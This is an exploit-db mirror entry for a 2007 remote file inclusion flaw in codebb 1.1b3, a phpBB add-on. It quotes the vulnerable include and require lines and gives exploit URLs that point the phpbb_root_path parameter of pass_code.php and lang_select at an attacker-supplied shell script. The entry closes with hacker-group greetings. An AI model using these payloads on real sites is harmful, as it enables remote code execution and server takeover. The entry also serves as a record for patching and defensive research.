exploit-db-mirror/exploits/php/webapps/3599.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
623 B
Text

# codebb 1.1b3 (phpbb_root_path )Remote File Include Vulnerability
# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net
# V.Code
# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);
require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);
# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL
[Path]/codebb/lang_select?phpbb_root_path=SheLL
# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa
# Thanx: asb-may.net & TrYaG.CoM
# milw0rm.com [2007-03-28]